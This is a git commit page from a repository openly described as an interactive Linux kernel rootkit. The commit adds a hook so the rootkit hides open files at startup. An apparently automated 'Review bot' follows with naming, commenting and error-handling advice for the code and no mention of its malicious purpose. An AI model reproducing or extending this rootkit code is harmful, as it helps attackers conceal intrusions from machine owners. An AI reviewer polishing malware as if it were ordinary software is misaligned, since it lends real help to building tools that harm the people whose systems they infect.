linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit

commit e061720c0026bdfa1da05947348dc579dcde4db5
parent 093c929968c61293c699678a1e814f403a6bf107
Author: deurzen <m.deurzen@tum.de>
Date:   Sun,  6 Dec 2020 04:14:59 +0100

hides open files on startup

Diffstat:
M src/hook.c | 3 +++
1 file changed, 3 insertions(+), 0 deletions(-)

diff --git a/src/hook.c b/src/hook.c @@ -69,6 +69,9 @@ init_hooks(void) if (rootkit.hiding_files) hide_files(); + if (rootkit.hiding_open) + hide_open(); + if (rootkit.hiding_pids) { clear_hidden_pids(); unhide_pids();
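
Review bot: The added `if (rootkit.hiding_open) hide_open();` in init_hooks() carries no comment, and neither `hiding_open` nor `hide_open()` says what is "open". Sitting directly below `if (rootkit.hiding_files) hide_files();`, the two flags are hard to tell apart without reading the commit message ("open files"). A one-line comment above the new check, or a more explicit name such as `hiding_open_files`, would make the distinction clear at the call site. The result of `hide_open()` is also discarded, matching the `hide_files()` call above it. This hunk does not show whether `hide_open()` can fail; if it can, init_hooks() should check the return value rather than continue as though the state was applied.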